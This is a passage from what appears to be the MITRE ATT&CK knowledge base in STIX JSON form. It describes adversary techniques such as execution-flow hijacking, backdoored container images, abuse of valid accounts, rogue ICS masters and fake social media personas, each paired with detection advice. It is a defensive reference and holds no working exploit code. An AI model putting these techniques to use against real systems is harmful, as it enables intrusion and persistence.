can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Dor Edry, Microsoft"], "x_mitre_deprecated": false, "x_mitre_detection": "Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2", "created": "2020-10-01T01:01:00.176Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1584/006", "external_id": "T1584.006"}, {"source_name": "Recorded Future Turla Infra 2020", "description": "Insikt Group. (2020, March 12). Swallowing the Snake\u2019s Tail: Tracking Turla Infrastructure. Retrieved October 20, 2020.", "url": "https://www.recordedfuture.com/turla-apt-infrastructure/"}, {"source_name": "ThreatConnect Infrastructure Dec 2020", "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Modify System Image", "description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Most embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. \n\nCompare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised. (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", "created": "2020-10-19T19:42:19.740Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1601", "external_id": "T1601"}, {"source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7"}, {"source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.", "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-11-21T20:02:33.404Z", "name": "Hijack Execution Flow", "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.\n\nLook for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nMonitor for changes to environment variables, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.\n\nService changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Application Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "created": "2020-03-12T20:38:12.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1574", "external_id": "T1574"}, {"source_name": "Autoruns for Windows", "description": "Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.", "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-24T14:00:00.188Z", "name": "Indicator Removal from Tools", "description": "Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Host intrusion prevention systems", "Log analysis", "Signature-based detection"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", "created": "2020-03-19T21:27:32.820Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027/005", "external_id": "T1027.005"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:08.992Z", "name": "Graphical User Interface", "description": "Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard.\n\nIf physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Process: Process Creation", "Command: Command Execution", "Module: Module Load", "Logon Session: Logon Session Creation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0823", "external_id": "T0823"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Malicious Image", "description": "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)\n\nAdversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Center for Threat-Informed Defense (CTID)", "Vishwas Manral, McAfee"], "x_mitre_detection": "Monitor the local image registry to make sure malicious images are not added. Track the deployment of new containers, especially from newly built images. Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS", "Containers"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b0c74ef9-c61e-4986-88cb-78da98a355ec", "created": "2021-03-30T17:20:05.789Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1204/003", "external_id": "T1204.003"}, {"source_name": "Summit Route Malicious AMIs", "description": "Piper, S.. (2018, September 24). Investigating Malicious AMIs. Retrieved March 30, 2021.", "url": "https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/"}, {"source_name": "Aqua Security Cloud Native Threat Report June 2021", "description": "Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.", "url": "https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-16T12:35:38.832Z", "name": "Container Service", "description": "Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for creating and managing individual containers, such as Docker and Podman, as well as container cluster node-level agents such as kubelet. By modifying these services, an adversary may be able to achieve persistence or escalate their privileges on a host.\n\nFor example, by using the `docker run` or `podman run` command with the `restart=always` directive, a container can be configured to persistently restart on the host.(Citation: AquaSec TeamTNT 2023) A user with access to the (rootful) docker command may also be able to escalate their privileges on the host.(Citation: GTFOBins Docker)\n\nIn Kubernetes environments, DaemonSets allow an adversary to persistently [Deploy Container](https://attack.mitre.org/techniques/T1610)s on all nodes, including ones added later to the cluster.(Citation: Aquasec Kubernetes Attack 2023)(Citation: Kubernetes DaemonSet) Pods can also be deployed to specific nodes using the `nodeSelector` or `nodeName` fields in the pod spec.(Citation: Kubernetes Assigning Pods to Nodes)(Citation: AppSecco Kubernetes Namespace Breakout 2020)\n\nNote that containers can also be configured to run as [Systemd Service](https://attack.mitre.org/techniques/T1543/002)s.(Citation: Podman Systemd)(Citation: Docker Systemd)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Containers"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b0e54bf7-835e-4f44-bd8e-62f431b9b76a", "created": "2024-02-15T13:41:46.784Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1543/005", "external_id": "T1543.005"}, {"source_name": "AppSecco Kubernetes Namespace Breakout 2020", "description": "Abhisek Datta. (2020, March 18). Kubernetes Namespace Breakout using Insecure Host Path Volume \u2014 Part 1. Retrieved January 16, 2024.", "url": "https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216"}, {"source_name": "Docker Systemd", "description": "Docker. (n.d.). Start containers automatically. Retrieved February 15, 2024.", "url": "https://docs.docker.com/config/containers/start-containers-automatically/"}, {"source_name": "GTFOBins Docker", "description": "GTFOBins. (n.d.). docker. Retrieved February 15, 2024.", "url": "https://gtfobins.github.io/gtfobins/docker/"}, {"source_name": "Kubernetes Assigning Pods to Nodes", "description": "Kubernetes. (n.d.). Assigning Pods to Nodes. Retrieved February 15, 2024.", "url": "https://kubernetes.io/docs/concepts/scheduling-eviction/assign-pod-node/"}, {"source_name": "Kubernetes DaemonSet", "description": "Kubernetes. (n.d.). DaemonSet. Retrieved February 15, 2024.", "url": "https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/"}, {"source_name": "Aquasec Kubernetes Attack 2023", "description": "Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14, 2023.", "url": "https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters"}, {"source_name": "AquaSec TeamTNT 2023", "description": "Ofek Itach and Assaf Morag. (2023, July 13). TeamTNT Reemerged with New Aggressive Cloud Campaign. Retrieved February 15, 2024.", "url": "https://blog.aquasec.com/teamtnt-reemerged-with-new-aggressive-cloud-campaign"}, {"source_name": "Podman Systemd", "description": "Valentin Rothberg. (2022, March 16). How to run pods as systemd services with Podman. Retrieved February 15, 2024.", "url": "https://www.redhat.com/sysadmin/podman-run-pods-systemd-services"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:09.193Z", "name": "Rogue Master", "description": "Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection. \n\nIn the case of the 2017 Dallas Siren incident, adversaries used a rogue master to send command messages to the 156 distributed sirens across the city, either through a single rogue transmitter with a strong signal, or using many distributed repeaters. (Citation: Bastille April 2017) (Citation: Zack Whittaker April 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.2", "x_mitre_data_sources": ["Network Traffic: Network Traffic Flow", "Operational Databases: Device Alarm", "Network Traffic: Network Traffic Content", "Application Log: Application Log Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0848", "external_id": "T0848"}, {"source_name": "Bastille April 2017", "description": "Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06 ", "url": "https://www.bastille.net/blogs/2017/4/17/dallas-siren-attack"}, {"source_name": "Zack Whittaker April 2017", "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Valid Accounts", "description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nIn some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Syed Ummar Farooqh, McAfee", "Prasad Somasamudram, McAfee", "Sekhar Sarukkai, McAfee", "Jon Sternstein, Stern Security", "Yossi Weizman, Azure Defender Research Team", "Netskope", "Mark Wee", "Praetorian", "Goldstein Menachem"], "x_mitre_deprecated": false, "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace", "Containers", "Network"], "x_mitre_version": "2.6", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Firewall", "Anti-virus", "Host Intrusion Prevention Systems", "Network Intrusion Detection System", "Application Control", "System Access Controls"], "x_mitre_effective_permissions": ["User", "Administrator"], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "created": "2017-05-31T21:31:00.645Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1078", "external_id": "T1078"}, {"source_name": "volexity_0day_sophos_FW", "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.", "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/"}, {"source_name": "CISA MFA PrintNightmare", "description": "Cybersecurity and Infrastructure Security Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and \u201cPrintNightmare\u201d Vulnerability. Retrieved March 16, 2022.", "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-074a"}, {"source_name": "TechNet Credential Theft", "description": "Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.", "url": "https://technet.microsoft.com/en-us/library/dn535501.aspx"}, {"source_name": "TechNet Audit Policy", "description": "Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.", "url": "https://technet.microsoft.com/en-us/library/dn487457.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-31T14:00:00.188Z", "name": "Non-Standard Port", "description": "Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.\n\nAdversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", "created": "2020-03-14T18:18:32.443Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1571", "external_id": "T1571"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}, {"source_name": "Symantec Elfin Mar 2019", "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.", "url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage"}, {"source_name": "change_rdp_port_conti", "description": "The DFIR Report. (2022, March 1). \"Change RDP port\" #ContiLeaks. Retrieved March 1, 2022.", "url": "https://twitter.com/TheDFIRReport/status/1498657772254240768"}, {"source_name": "Fortinet Agent Tesla April 2018", "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.", "url": "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Social Media Accounts", "description": "Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. \n\nOnce a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928", "created": "2020-10-01T01:08:41.124Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1585/001", "external_id": "T1585.001"}, {"source_name": "NEWSCASTER2014", "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation"}, {"source_name": "BlackHatRobinSage", "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", "url": 